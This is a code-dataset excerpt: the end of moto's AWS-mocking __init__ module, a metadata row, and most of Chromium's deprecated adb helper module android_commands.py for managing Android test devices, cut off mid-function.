mock_opsworks_deprecated = lazy_load(".opsworks", "mock_opsworks_deprecated")
mock_organizations = lazy_load(".organizations", "mock_organizations")
mock_polly = lazy_load(".polly", "mock_polly")
mock_ram = lazy_load(".ram", "mock_ram")
mock_rds = lazy_load(".rds", "mock_rds", warn_repurpose=True)
mock_rds_deprecated = lazy_load(".rds", "mock_rds_deprecated")
mock_rds2 = lazy_load(".rds2", "mock_rds2", boto3_name="rds")
mock_rds2_deprecated = lazy_load(".rds2", "mock_rds2_deprecated")
mock_redshift = lazy_load(".redshift", "mock_redshift")
mock_redshift_deprecated = lazy_load(".redshift", "mock_redshift_deprecated")
mock_resourcegroups = lazy_load(
".resourcegroups", "mock_resourcegroups", boto3_name="resource-groups"
)
mock_resourcegroupstaggingapi = lazy_load(
".resourcegroupstaggingapi", "mock_resourcegroupstaggingapi"
)
mock_route53 = lazy_load(".route53", "mock_route53")
mock_route53_deprecated = lazy_load(".route53", "mock_route53_deprecated")
mock_route53resolver = lazy_load(
".route53resolver", "mock_route53resolver", boto3_name="route53resolver"
)
mock_s3 = lazy_load(".s3", "mock_s3")
mock_s3_deprecated = lazy_load(".s3", "mock_s3_deprecated")
mock_sagemaker = lazy_load(".sagemaker", "mock_sagemaker")
mock_secretsmanager = lazy_load(".secretsmanager", "mock_secretsmanager")
mock_ses = lazy_load(".ses", "mock_ses")
mock_ses_deprecated = lazy_load(".ses", "mock_ses_deprecated")
mock_sns = lazy_load(".sns", "mock_sns")
mock_sns_deprecated = lazy_load(".sns", "mock_sns_deprecated")
mock_sqs = lazy_load(".sqs", "mock_sqs")
mock_sqs_deprecated = lazy_load(".sqs", "mock_sqs_deprecated")
mock_ssm = lazy_load(".ssm", "mock_ssm")
mock_stepfunctions = lazy_load(
".stepfunctions", "mock_stepfunctions", backend="stepfunction_backends"
)
mock_sts = lazy_load(".sts", "mock_sts")
mock_sts_deprecated = lazy_load(".sts", "mock_sts_deprecated")
mock_swf = lazy_load(".swf", "mock_swf")
mock_swf_deprecated = lazy_load(".swf", "mock_swf_deprecated")
mock_timestreamwrite = lazy_load(
".timestreamwrite", "mock_timestreamwrite", boto3_name="timestream-write"
)
mock_transcribe = lazy_load(".transcribe", "mock_transcribe")
XRaySegment = lazy_load(".xray", "XRaySegment")
mock_xray = lazy_load(".xray", "mock_xray")
mock_xray_client = lazy_load(".xray", "mock_xray_client")
mock_kinesisvideo = lazy_load(".kinesisvideo", "mock_kinesisvideo")
mock_kinesisvideoarchivedmedia = lazy_load(
".kinesisvideoarchivedmedia",
"mock_kinesisvideoarchivedmedia",
boto3_name="kinesis-video-archived-media",
)
mock_medialive = lazy_load(".medialive", "mock_medialive")
mock_support = lazy_load(".support", "mock_support")
mock_mediaconnect = lazy_load(".mediaconnect", "mock_mediaconnect")
mock_mediapackage = lazy_load(".mediapackage", "mock_mediapackage")
mock_mediastore = lazy_load(".mediastore", "mock_mediastore")
mock_eks = lazy_load(".eks", "mock_eks")
mock_mediastoredata = lazy_load(
".mediastoredata", "mock_mediastoredata", boto3_name="mediastore-data"
)
mock_efs = lazy_load(".efs", "mock_efs")
mock_wafv2 = lazy_load(".wafv2", "mock_wafv2")
mock_sdb = lazy_load(".sdb", "mock_sdb")
mock_elasticache = lazy_load(
".elasticache", "mock_elasticache", boto3_name="elasticache"
)
class MockAll(ContextDecorator):
def __init__(self):
self.mocks = []
for mock in dir(sys.modules["moto"]):
if (
mock.startswith("mock_")
and not mock.endswith("_deprecated")
and not mock == ("mock_all")
):
self.mocks.append(globals()[mock]())
def __enter__(self):
for mock in self.mocks:
mock.start()
def __exit__(self, *exc):
for mock in self.mocks:
mock.stop()
mock_all = MockAll
__title__ = "moto"
__version__ = "2.2.18.dev"
try:
from botocore.awsrequest import (
HTTPSConnectionPool,
HTTPConnectionPool,
HTTPConnection,
VerifiedHTTPSConnection,
)
except ImportError:
pass
else:
HTTPSConnectionPool.ConnectionCls = VerifiedHTTPSConnection
HTTPConnectionPool.ConnectionCls = HTTPConnection
| true
| true
|
f7191f7935da25cbd12b4c11447277fbf7e9bc34
| 73,117
|
py
|
Python
|
build/android/pylib/android_commands.py
|
gw280/buildroot
|
85c55625fd2cdd92e756b2b845ed054f7bd19130
|
[
"BSD-3-Clause"
] | 20
|
2015-08-26T06:46:00.000Z
|
2019-02-27T09:05:58.000Z
|
build/android/pylib/android_commands.py
|
gw280/buildroot
|
85c55625fd2cdd92e756b2b845ed054f7bd19130
|
[
"BSD-3-Clause"
] | 3
|
2019-01-02T17:06:03.000Z
|
2019-01-16T23:55:04.000Z
|
build/android/pylib/android_commands.py
|
gw280/buildroot
|
85c55625fd2cdd92e756b2b845ed054f7bd19130
|
[
"BSD-3-Clause"
] | 2
|
2015-08-26T05:49:35.000Z
|
2020-02-03T20:22:43.000Z
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Provides an interface to communicate with the device via the adb command.
Assumes adb binary is currently on system path.
Note that this module is deprecated.
"""
# TODO(jbudorick): Delete this file once no clients use it.
# pylint: skip-file
import collections
import datetime
import inspect
import logging
import os
import random
import re
import shlex
import signal
import subprocess
import sys
import tempfile
import time
import cmd_helper
import constants
import system_properties
from utils import host_utils
try:
from pylib import pexpect
except ImportError:
pexpect = None
sys.path.append(os.path.join(
constants.DIR_SOURCE_ROOT, 'third_party', 'android_testrunner'))
import adb_interface
import am_instrument_parser
import errors
from pylib.device import device_blacklist
from pylib.device import device_errors
# Pattern to search for the next whole line of pexpect output and capture it
# into a match group. We can't use ^ and $ for line start end with pexpect,
# see http://www.noah.org/python/pexpect/#doc for explanation why.
PEXPECT_LINE_RE = re.compile('\n([^\r]*)\r')
# Set the adb shell prompt to be a unique marker that will [hopefully] not
# appear at the start of any line of a command's output.
SHELL_PROMPT = '~+~PQ\x17RS~+~'
# Java properties file
LOCAL_PROPERTIES_PATH = constants.DEVICE_LOCAL_PROPERTIES_PATH
# Property in /data/local.prop that controls Java assertions.
JAVA_ASSERT_PROPERTY = 'dalvik.vm.enableassertions'
# Keycode "enum" suitable for passing to AndroidCommands.SendKey().
KEYCODE_HOME = 3
KEYCODE_BACK = 4
KEYCODE_DPAD_UP = 19
KEYCODE_DPAD_DOWN = 20
KEYCODE_DPAD_RIGHT = 22
KEYCODE_ENTER = 66
KEYCODE_MENU = 82
MD5SUM_DEVICE_FOLDER = constants.TEST_EXECUTABLE_DIR + '/md5sum/'
MD5SUM_DEVICE_PATH = MD5SUM_DEVICE_FOLDER + 'md5sum_bin'
PIE_WRAPPER_PATH = constants.TEST_EXECUTABLE_DIR + '/run_pie'
CONTROL_USB_CHARGING_COMMANDS = [
{
# Nexus 4
'witness_file': '/sys/module/pm8921_charger/parameters/disabled',
'enable_command': 'echo 0 > /sys/module/pm8921_charger/parameters/disabled',
'disable_command':
'echo 1 > /sys/module/pm8921_charger/parameters/disabled',
},
{
# Nexus 5
# Setting the HIZ bit of the bq24192 causes the charger to actually ignore
# energy coming from USB. Setting the power_supply offline just updates the
# Android system to reflect that.
'witness_file': '/sys/kernel/debug/bq24192/INPUT_SRC_CONT',
'enable_command': (
'echo 0x4A > /sys/kernel/debug/bq24192/INPUT_SRC_CONT && '
'echo 1 > /sys/class/power_supply/usb/online'),
'disable_command': (
'echo 0xCA > /sys/kernel/debug/bq24192/INPUT_SRC_CONT && '
'chmod 644 /sys/class/power_supply/usb/online && '
'echo 0 > /sys/class/power_supply/usb/online'),
},
]
class DeviceTempFile(object):
def __init__(self, android_commands, prefix='temp_file', suffix=''):
"""Find an unused temporary file path in the devices external directory.
When this object is closed, the file will be deleted on the device.
"""
self.android_commands = android_commands
while True:
# TODO(cjhopman): This could actually return the same file in multiple
# calls if the caller doesn't write to the files immediately. This is
# expected to never happen.
i = random.randint(0, 1000000)
self.name = '%s/%s-%d-%010d%s' % (
android_commands.GetExternalStorage(),
prefix, int(time.time()), i, suffix)
if not android_commands.FileExistsOnDevice(self.name):
break
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def close(self):
self.android_commands.RunShellCommand('rm ' + self.name)
def GetAVDs():
"""Returns a list of AVDs."""
re_avd = re.compile('^[ ]+Name: ([a-zA-Z0-9_:.-]+)', re.MULTILINE)
avds = re_avd.findall(cmd_helper.GetCmdOutput(['android', 'list', 'avd']))
return avds
def ResetBadDevices():
"""Removes the blacklist that keeps track of bad devices for a current
build.
"""
device_blacklist.ResetBlacklist()
def ExtendBadDevices(devices):
"""Adds devices to the blacklist that keeps track of bad devices for a
current build.
The devices listed in the bad devices file will not be returned by
GetAttachedDevices.
Args:
devices: list of bad devices to be added to the bad devices file.
"""
device_blacklist.ExtendBlacklist(devices)
def GetAttachedDevices(hardware=True, emulator=True, offline=False):
"""Returns a list of attached, android devices and emulators.
If a preferred device has been set with ANDROID_SERIAL, it will be first in
the returned list. The arguments specify what devices to include in the list.
Example output:
* daemon not running. starting it now on port 5037 *
* daemon started successfully *
List of devices attached
027c10494100b4d7 device
emulator-5554 offline
Args:
hardware: Include attached actual devices that are online.
emulator: Include emulators (i.e. AVD's) currently on host.
offline: Include devices and emulators that are offline.
Returns: List of devices.
"""
adb_devices_output = cmd_helper.GetCmdOutput([constants.GetAdbPath(),
'devices'])
re_device = re.compile('^([a-zA-Z0-9_:.-]+)\tdevice$', re.MULTILINE)
online_devices = re_device.findall(adb_devices_output)
re_device = re.compile('^(emulator-[0-9]+)\tdevice', re.MULTILINE)
emulator_devices = re_device.findall(adb_devices_output)
re_device = re.compile('^([a-zA-Z0-9_:.-]+)\t(?:offline|unauthorized)$',
re.MULTILINE)
offline_devices = re_device.findall(adb_devices_output)
devices = []
# First determine list of online devices (e.g. hardware and/or emulator).
if hardware and emulator:
devices = online_devices
elif hardware:
devices = [device for device in online_devices
if device not in emulator_devices]
elif emulator:
devices = emulator_devices
# Now add offline devices if offline is true
if offline:
devices = devices + offline_devices
# Remove any devices in the blacklist.
blacklist = device_blacklist.ReadBlacklist()
if len(blacklist):
logging.info('Avoiding bad devices %s', ' '.join(blacklist))
devices = [device for device in devices if device not in blacklist]
preferred_device = os.environ.get('ANDROID_SERIAL')
if preferred_device in devices:
devices.remove(preferred_device)
devices.insert(0, preferred_device)
return devices
def IsDeviceAttached(device):
"""Return true if the device is attached and online."""
return device in GetAttachedDevices()
def _GetFilesFromRecursiveLsOutput(path, ls_output, re_file, utc_offset=None):
"""Gets a list of files from `ls` command output.
Python's os.walk isn't used because it doesn't work over adb shell.
Args:
path: The path to list.
ls_output: A list of lines returned by an `ls -lR` command.
re_file: A compiled regular expression which parses a line into named groups
consisting of at minimum "filename", "date", "time", "size" and
optionally "timezone".
utc_offset: A 5-character string of the form +HHMM or -HHMM, where HH is a
2-digit string giving the number of UTC offset hours, and MM is a
2-digit string giving the number of UTC offset minutes. If the input
utc_offset is None, will try to look for the value of "timezone" if it
is specified in re_file.
Returns:
A dict of {"name": (size, lastmod), ...} where:
name: The file name relative to |path|'s directory.
size: The file size in bytes (0 for directories).
lastmod: The file last modification date in UTC.
"""
re_directory = re.compile('^%s/(?P<dir>[^:]+):$' % re.escape(path))
path_dir = os.path.dirname(path)
current_dir = ''
files = {}
for line in ls_output:
directory_match = re_directory.match(line)
if directory_match:
current_dir = directory_match.group('dir')
continue
file_match = re_file.match(line)
if file_match:
filename = os.path.join(current_dir, file_match.group('filename'))
if filename.startswith(path_dir):
filename = filename[len(path_dir) + 1:]
lastmod = datetime.datetime.strptime(
file_match.group('date') + ' ' + file_match.group('time')[:5],
'%Y-%m-%d %H:%M')
if not utc_offset and 'timezone' in re_file.groupindex:
utc_offset = file_match.group('timezone')
if isinstance(utc_offset, str) and len(utc_offset) == 5:
utc_delta = datetime.timedelta(hours=int(utc_offset[1:3]),
minutes=int(utc_offset[3:5]))
if utc_offset[0:1] == '-':
utc_delta = -utc_delta
lastmod -= utc_delta
files[filename] = (int(file_match.group('size')), lastmod)
return files
def _ParseMd5SumOutput(md5sum_output):
"""Returns a list of tuples from the provided md5sum output.
Args:
md5sum_output: output directly from md5sum binary.
Returns:
List of namedtuples with attributes |hash| and |path|, where |path| is the
absolute path to the file with an Md5Sum of |hash|.
"""
HashAndPath = collections.namedtuple('HashAndPath', ['hash', 'path'])
split_lines = [line.split(' ') for line in md5sum_output]
return [HashAndPath._make(s) for s in split_lines if len(s) == 2]
def _HasAdbPushSucceeded(command_output):
"""Returns whether adb push has succeeded from the provided output."""
# TODO(frankf): We should look at the return code instead of the command
# output for many of the commands in this file.
if not command_output:
return True
# Success looks like this: "3035 KB/s (12512056 bytes in 4.025s)"
# Errors look like this: "failed to copy ... "
if not re.search('^[0-9]', command_output.splitlines()[-1]):
logging.critical('PUSH FAILED: ' + command_output)
return False
return True
def GetLogTimestamp(log_line, year):
"""Returns the timestamp of the given |log_line| in the given year."""
try:
return datetime.datetime.strptime('%s-%s' % (year, log_line[:18]),
'%Y-%m-%d %H:%M:%S.%f')
except (ValueError, IndexError):
logging.critical('Error reading timestamp from ' + log_line)
return None
class AndroidCommands(object):
"""Helper class for communicating with Android device via adb."""
def __init__(self, device=None):
"""Constructor.
Args:
device: If given, adb commands are only send to the device of this ID.
Otherwise commands are sent to all attached devices.
"""
self._adb = adb_interface.AdbInterface(constants.GetAdbPath())
if device:
self._adb.SetTargetSerial(device)
self._device = device
self._logcat = None
self.logcat_process = None
self._logcat_tmpoutfile = None
self._pushed_files = []
self._device_utc_offset = None
self._potential_push_size = 0
self._actual_push_size = 0
self._external_storage = ''
self._util_wrapper = ''
self._system_properties = system_properties.SystemProperties(self.Adb())
self._push_if_needed_cache = {}
self._control_usb_charging_command = {
'command': None,
'cached': False,
}
self._protected_file_access_method_initialized = None
self._privileged_command_runner = None
self._pie_wrapper = None
@property
def system_properties(self):
return self._system_properties
def _LogShell(self, cmd):
"""Logs the adb shell command."""
if self._device:
device_repr = self._device[-4:]
else:
device_repr = '????'
logging.info('[%s]> %s', device_repr, cmd)
def Adb(self):
"""Returns our AdbInterface to avoid us wrapping all its methods."""
# TODO(tonyg): Goal should be to git rid of this method by making this API
# complete and alleviating the need.
return self._adb
def GetDevice(self):
"""Returns the device serial."""
return self._device
def IsOnline(self):
"""Checks whether the device is online.
Returns:
True if device is in 'device' mode, False otherwise.
"""
# TODO(aurimas): revert to using adb get-state when android L adb is fixed.
#out = self._adb.SendCommand('get-state')
#return out.strip() == 'device'
out = self._adb.SendCommand('devices')
for line in out.split('\n'):
if self._device in line and 'device' in line:
return True
return False
def IsRootEnabled(self):
"""Checks if root is enabled on the device."""
root_test_output = self.RunShellCommand('ls /root') or ['']
return not 'Permission denied' in root_test_output[0]
def EnableAdbRoot(self):
"""Enables adb root on the device.
Returns:
True: if output from executing adb root was as expected.
False: otherwise.
"""
if self.GetBuildType() == 'user':
logging.warning("Can't enable root in production builds with type user")
return False
else:
return_value = self._adb.EnableAdbRoot()
# EnableAdbRoot inserts a call for wait-for-device only when adb logcat
# output matches what is expected. Just to be safe add a call to
# wait-for-device.
self._adb.SendCommand('wait-for-device')
return return_value
def GetDeviceYear(self):
"""Returns the year information of the date on device."""
return self.RunShellCommand('date +%Y')[0]
def GetExternalStorage(self):
if not self._external_storage:
self._external_storage = self.RunShellCommand('echo $EXTERNAL_STORAGE')[0]
if not self._external_storage:
raise device_errors.CommandFailedError(
['shell', "'echo $EXTERNAL_STORAGE'"],
'Unable to find $EXTERNAL_STORAGE')
return self._external_storage
def WaitForDevicePm(self, timeout=120):
"""Blocks until the device's package manager is available.
To workaround http://b/5201039, we restart the shell and retry if the
package manager isn't back after 120 seconds.
Raises:
errors.WaitForResponseTimedOutError after max retries reached.
"""
last_err = None
retries = 3
while retries:
try:
self._adb.WaitForDevicePm(wait_time=timeout)
return # Success
except errors.WaitForResponseTimedOutError as e:
last_err = e
logging.warning('Restarting and retrying after timeout: %s', e)
retries -= 1
self.RestartShell()
raise last_err # Only reached after max retries, re-raise the last error.
def RestartShell(self):
"""Restarts the shell on the device. Does not block for it to return."""
self.RunShellCommand('stop')
self.RunShellCommand('start')
def Reboot(self, full_reboot=True):
"""Reboots the device and waits for the package manager to return.
Args:
full_reboot: Whether to fully reboot the device or just restart the shell.
"""
# TODO(torne): hive can't reboot the device either way without breaking the
# connection; work out if we can handle this better
if os.environ.get('USING_HIVE'):
logging.warning('Ignoring reboot request as we are on hive')
return
if full_reboot or not self.IsRootEnabled():
self._adb.SendCommand('reboot')
self._system_properties = system_properties.SystemProperties(self.Adb())
timeout = 300
retries = 1
# Wait for the device to disappear.
while retries < 10 and self.IsOnline():
time.sleep(1)
retries += 1
else:
self.RestartShell()
timeout = 120
# To run tests we need at least the package manager and the sd card (or
# other external storage) to be ready.
self.WaitForDevicePm(timeout)
self.WaitForSdCardReady(timeout)
def Shutdown(self):
"""Shuts down the device."""
self._adb.SendCommand('reboot -p')
self._system_properties = system_properties.SystemProperties(self.Adb())
def Uninstall(self, package):
"""Uninstalls the specified package from the device.
Args:
package: Name of the package to remove.
Returns:
A status string returned by adb uninstall
"""
uninstall_command = 'uninstall %s' % package
self._LogShell(uninstall_command)
return self._adb.SendCommand(uninstall_command, timeout_time=60)
def Install(self, package_file_path, reinstall=False):
"""Installs the specified package to the device.
Args:
package_file_path: Path to .apk file to install.
reinstall: Reinstall an existing apk, keeping the data.
Returns:
A status string returned by adb install
"""
assert os.path.isfile(package_file_path), ('<%s> is not file' %
package_file_path)
install_cmd = ['install']
if reinstall:
install_cmd.append('-r')
install_cmd.append(package_file_path)
install_cmd = ' '.join(install_cmd)
self._LogShell(install_cmd)
return self._adb.SendCommand(install_cmd,
timeout_time=2 * 60,
retry_count=0)
def ManagedInstall(self, apk_path, keep_data=False, package_name=None,
reboots_on_timeout=2):
"""Installs specified package and reboots device on timeouts.
If package_name is supplied, checks if the package is already installed and
doesn't reinstall if the apk md5sums match.
Args:
apk_path: Path to .apk file to install.
keep_data: Reinstalls instead of uninstalling first, preserving the
application data.
package_name: Package name (only needed if keep_data=False).
reboots_on_timeout: number of time to reboot if package manager is frozen.
"""
# Check if package is already installed and up to date.
if package_name:
installed_apk_path = self.GetApplicationPath(package_name)
if (installed_apk_path and
not self.GetFilesChanged(apk_path, installed_apk_path,
ignore_filenames=True)):
logging.info('Skipped install: identical %s APK already installed' %
package_name)
return
# Install.
reboots_left = reboots_on_timeout
while True:
try:
if not keep_data:
assert package_name
self.Uninstall(package_name)
install_status = self.Install(apk_path, reinstall=keep_data)
if 'Success' in install_status:
return
else:
raise Exception('Install failure: %s' % install_status)
except errors.WaitForResponseTimedOutError:
print '@@@STEP_WARNINGS@@@'
logging.info('Timeout on installing %s on device %s', apk_path,
self._device)
if reboots_left <= 0:
raise Exception('Install timed out')
# Force a hard reboot on last attempt
self.Reboot(full_reboot=(reboots_left == 1))
reboots_left -= 1
def MakeSystemFolderWritable(self):
"""Remounts the /system folder rw."""
out = self._adb.SendCommand('remount')
if out.strip() != 'remount succeeded':
raise errors.MsgException('Remount failed: %s' % out)
def RestartAdbdOnDevice(self):
logging.info('Restarting adbd on the device...')
with DeviceTempFile(self, suffix=".sh") as temp_script_file:
host_script_path = os.path.join(constants.DIR_SOURCE_ROOT,
'build',
'android',
'pylib',
'restart_adbd.sh')
self._adb.Push(host_script_path, temp_script_file.name)
self.RunShellCommand('. %s' % temp_script_file.name)
self._adb.SendCommand('wait-for-device')
def RestartAdbServer(self):
"""Restart the adb server."""
ret = self.KillAdbServer()
if ret != 0:
raise errors.MsgException('KillAdbServer: %d' % ret)
ret = self.StartAdbServer()
if ret != 0:
raise errors.MsgException('StartAdbServer: %d' % ret)
@staticmethod
def KillAdbServer():
"""Kill adb server."""
adb_cmd = [constants.GetAdbPath(), 'kill-server']
ret = cmd_helper.RunCmd(adb_cmd)
retry = 0
while retry < 3:
ret, _ = cmd_helper.GetCmdStatusAndOutput(['pgrep', 'adb'])
if ret != 0:
# pgrep didn't find adb, kill-server succeeded.
return 0
retry += 1
time.sleep(retry)
return ret
def StartAdbServer(self):
"""Start adb server."""
adb_cmd = ['taskset', '-c', '0', constants.GetAdbPath(), 'start-server']
ret, _ = cmd_helper.GetCmdStatusAndOutput(adb_cmd)
retry = 0
while retry < 3:
ret, _ = cmd_helper.GetCmdStatusAndOutput(['pgrep', 'adb'])
if ret == 0:
# pgrep found adb, start-server succeeded.
# Waiting for device to reconnect before returning success.
self._adb.SendCommand('wait-for-device')
return 0
retry += 1
time.sleep(retry)
return ret
def WaitForSystemBootCompleted(self, wait_time):
"""Waits for targeted system's boot_completed flag to be set.
Args:
wait_time: time in seconds to wait
Raises:
WaitForResponseTimedOutError if wait_time elapses and flag still not
set.
"""
logging.info('Waiting for system boot completed...')
self._adb.SendCommand('wait-for-device')
# Now the device is there, but system not boot completed.
# Query the sys.boot_completed flag with a basic command
boot_completed = False
attempts = 0
wait_period = 5
while not boot_completed and (attempts * wait_period) < wait_time:
output = self.system_properties['sys.boot_completed']
output = output.strip()
if output == '1':
boot_completed = True
else:
# If 'error: xxx' returned when querying the flag, it means
# adb server lost the connection to the emulator, so restart the adb
# server.
if 'error:' in output:
self.RestartAdbServer()
time.sleep(wait_period)
attempts += 1
if not boot_completed:
raise errors.WaitForResponseTimedOutError(
'sys.boot_completed flag was not set after %s seconds' % wait_time)
def WaitForSdCardReady(self, timeout_time):
"""Wait for the SD card ready before pushing data into it."""
logging.info('Waiting for SD card ready...')
sdcard_ready = False
attempts = 0
wait_period = 5
external_storage = self.GetExternalStorage()
while not sdcard_ready and attempts * wait_period < timeout_time:
output = self.RunShellCommand('ls ' + external_storage)
if output:
sdcard_ready = True
else:
time.sleep(wait_period)
attempts += 1
if not sdcard_ready:
raise errors.WaitForResponseTimedOutError(
'SD card not ready after %s seconds' % timeout_time)
def GetAndroidToolStatusAndOutput(self, command, lib_path=None, *args, **kw):
"""Runs a native Android binary, wrapping the command as necessary.
This is a specialization of GetShellCommandStatusAndOutput, which is meant
for running tools/android/ binaries and handle properly: (1) setting the
lib path (for component=shared_library), (2) using the PIE wrapper on ICS.
See crbug.com/373219 for more context.
Args:
command: String containing the command to send.
lib_path: (optional) path to the folder containing the dependent libs.
Same other arguments of GetCmdStatusAndOutput.
"""
# The first time this command is run the device is inspected to check
# whether a wrapper for running PIE executable is needed (only Android ICS)
# or not. The results is cached, so the wrapper is pushed only once.
if self._pie_wrapper is None:
# None: did not check; '': did check and not needed; '/path': use /path.
self._pie_wrapper = ''
if self.GetBuildId().startswith('I'): # Ixxxx = Android ICS.
run_pie_dist_path = os.path.join(constants.GetOutDirectory(), 'run_pie')
assert os.path.exists(run_pie_dist_path), 'Please build run_pie'
# The PIE loader must be pushed manually (i.e. no PushIfNeeded) because
# PushIfNeeded requires md5sum and md5sum requires the wrapper as well.
adb_command = 'push %s %s' % (run_pie_dist_path, PIE_WRAPPER_PATH)
assert _HasAdbPushSucceeded(self._adb.SendCommand(adb_command))
self._pie_wrapper = PIE_WRAPPER_PATH
if self._pie_wrapper:
command = '%s %s' % (self._pie_wrapper, command)
if lib_path:
command = 'LD_LIBRARY_PATH=%s %s' % (lib_path, command)
return self.GetShellCommandStatusAndOutput(command, *args, **kw)
# It is tempting to turn this function into a generator, however this is not
# possible without using a private (local) adb_shell instance (to ensure no
# other command interleaves usage of it), which would defeat the main aim of
# being able to reuse the adb shell instance across commands.
def RunShellCommand(self, command, timeout_time=20, log_result=False):
"""Send a command to the adb shell and return the result.
Args:
command: String containing the shell command to send.
timeout_time: Number of seconds to wait for command to respond before
retrying, used by AdbInterface.SendShellCommand.
log_result: Boolean to indicate whether we should log the result of the
shell command.
Returns:
list containing the lines of output received from running the command
"""
self._LogShell(command)
if "'" in command:
command = command.replace('\'', '\'\\\'\'')
result = self._adb.SendShellCommand(
"'%s'" % command, timeout_time).splitlines()
# TODO(b.kelemen): we should really be able to drop the stderr of the
# command or raise an exception based on what the caller wants.
result = [ l for l in result if not l.startswith('WARNING') ]
if ['error: device not found'] == result:
raise errors.DeviceUnresponsiveError('device not found')
if log_result:
self._LogShell('\n'.join(result))
return result
def GetShellCommandStatusAndOutput(self, command, timeout_time=20,
log_result=False):
"""See RunShellCommand() above.
Returns:
The tuple (exit code, list of output lines).
"""
lines = self.RunShellCommand(
command + '; echo %$?', timeout_time, log_result)
last_line = lines[-1]
status_pos = last_line.rfind('%')
assert status_pos >= 0
status = int(last_line[status_pos + 1:])
if status_pos == 0:
lines = lines[:-1]
else:
lines = lines[:-1] + [last_line[:status_pos]]
return (status, lines)
def KillAll(self, process, signum=9, with_su=False):
"""Android version of killall, connected via adb.
Args:
process: name of the process to kill off.
signum: signal to use, 9 (SIGKILL) by default.
with_su: wether or not to use su to kill the processes.
Returns:
the number of processes killed
"""
pids = self.ExtractPid(process)
if pids:
cmd = 'kill -%d %s' % (signum, ' '.join(pids))
if with_su:
self.RunShellCommandWithSU(cmd)
else:
self.RunShellCommand(cmd)
return len(pids)
def KillAllBlocking(self, process, timeout_sec, signum=9, with_su=False):
"""Blocking version of killall, connected via adb.
This waits until no process matching the corresponding name appears in ps'
output anymore.
Args:
process: name of the process to kill off
timeout_sec: the timeout in seconds
signum: same as |KillAll|
with_su: same as |KillAll|
Returns:
the number of processes killed
"""
processes_killed = self.KillAll(process, signum=signum, with_su=with_su)
if processes_killed:
elapsed = 0
wait_period = 0.1
# Note that this doesn't take into account the time spent in ExtractPid().
while self.ExtractPid(process) and elapsed < timeout_sec:
time.sleep(wait_period)
elapsed += wait_period
if elapsed >= timeout_sec:
return processes_killed - self.ExtractPid(process)
return processes_killed
@staticmethod
def _GetActivityCommand(package, activity, wait_for_completion, action,
category, data, extras, trace_file_name, force_stop,
flags):
"""Creates command to start |package|'s activity on the device.
Args - as for StartActivity
Returns:
the command to run on the target to start the activity
"""
cmd = 'am start -a %s' % action
if force_stop:
cmd += ' -S'
if wait_for_completion:
cmd += ' -W'
if category:
cmd += ' -c %s' % category
if package and activity:
cmd += ' -n %s/%s' % (package, activity)
if data:
cmd += ' -d "%s"' % data
if extras:
for key in extras:
value = extras[key]
if isinstance(value, str):
cmd += ' --es'
elif isinstance(value, bool):
cmd += ' --ez'
elif isinstance(value, int):
cmd += ' --ei'
else:
raise NotImplementedError(
'Need to teach StartActivity how to pass %s extras' % type(value))
cmd += ' %s %s' % (key, value)
if trace_file_name:
cmd += ' --start-profiler ' + trace_file_name
if flags:
cmd += ' -f %s' % flags
return cmd
def StartActivity(self, package, activity, wait_for_completion=False,
action='android.intent.action.VIEW',
category=None, data=None,
extras=None, trace_file_name=None,
force_stop=False, flags=None):
"""Starts |package|'s activity on the device.
Args:
package: Name of package to start (e.g. 'com.google.android.apps.chrome').
activity: Name of activity (e.g. '.Main' or
'com.google.android.apps.chrome.Main').
wait_for_completion: wait for the activity to finish launching (-W flag).
action: string (e.g. "android.intent.action.MAIN"). Default is VIEW.
category: string (e.g. "android.intent.category.HOME")
data: Data string to pass to activity (e.g. 'http://www.example.com/').
extras: Dict of extras to pass to activity. Values are significant.
trace_file_name: If used, turns on and saves the trace to this file name.
force_stop: force stop the target app before starting the activity (-S
flag).
Returns:
The output of the underlying command as a list of lines.
"""
cmd = self._GetActivityCommand(package, activity, wait_for_completion,
action, category, data, extras,
trace_file_name, force_stop, flags)
return self.RunShellCommand(cmd)
def StartActivityTimed(self, package, activity, wait_for_completion=False,
action='android.intent.action.VIEW',
category=None, data=None,
extras=None, trace_file_name=None,
force_stop=False, flags=None):
"""Starts |package|'s activity on the device, returning the start time
Args - as for StartActivity
Returns:
A tuple containing:
- the output of the underlying command as a list of lines, and
- a timestamp string for the time at which the activity started
"""
cmd = self._GetActivityCommand(package, activity, wait_for_completion,
action, category, data, extras,
trace_file_name, force_stop, flags)
self.StartMonitoringLogcat()
out = self.RunShellCommand('log starting activity; ' + cmd)
activity_started_re = re.compile('.*starting activity.*')
m = self.WaitForLogMatch(activity_started_re, None)
assert m
start_line = m.group(0)
return (out, GetLogTimestamp(start_line, self.GetDeviceYear()))
def StartCrashUploadService(self, package):
# TODO(frankf): We really need a python wrapper around Intent
# to be shared with StartActivity/BroadcastIntent.
cmd = (
'am startservice -a %s.crash.ACTION_FIND_ALL -n '
'%s/%s.crash.MinidumpUploadService' %
(constants.PACKAGE_INFO['chrome'].package,
package,
constants.PACKAGE_INFO['chrome'].package))
am_output = self.RunShellCommandWithSU(cmd)
assert am_output and 'Starting' in am_output[-1], (
'Service failed to start: %s' % am_output)
time.sleep(15)
def BroadcastIntent(self, package, intent, *args):
"""Send a broadcast intent.
Args:
package: Name of package containing the intent.
intent: Name of the intent.
args: Optional extra arguments for the intent.
"""
cmd = 'am broadcast -a %s.%s %s' % (package, intent, ' '.join(args))
self.RunShellCommand(cmd)
def GoHome(self):
"""Tell the device to return to the home screen. Blocks until completion."""
self.RunShellCommand('am start -W '
'-a android.intent.action.MAIN -c android.intent.category.HOME')
def CloseApplication(self, package):
"""Attempt to close down the application, using increasing violence.
Args:
package: Name of the process to kill off, e.g.
com.google.android.apps.chrome
"""
self.RunShellCommand('am force-stop ' + package)
def GetApplicationPath(self, package):
"""Get the installed apk path on the device for the given package.
Args:
package: Name of the package.
Returns:
Path to the apk on the device if it exists, None otherwise.
"""
pm_path_output = self.RunShellCommand('pm path ' + package)
# The path output contains anything if and only if the package
# exists.
if pm_path_output:
# pm_path_output is of the form: "package:/path/to/foo.apk"
return pm_path_output[0].split(':')[1]
else:
return None
def ClearApplicationState(self, package):
"""Closes and clears all state for the given |package|."""
# Check that the package exists before clearing it. Necessary because
# calling pm clear on a package that doesn't exist may never return.
pm_path_output = self.RunShellCommand('pm path ' + package)
# The path output only contains anything if and only if the package exists.
if pm_path_output:
self.RunShellCommand('pm clear ' + package)
def SendKeyEvent(self, keycode):
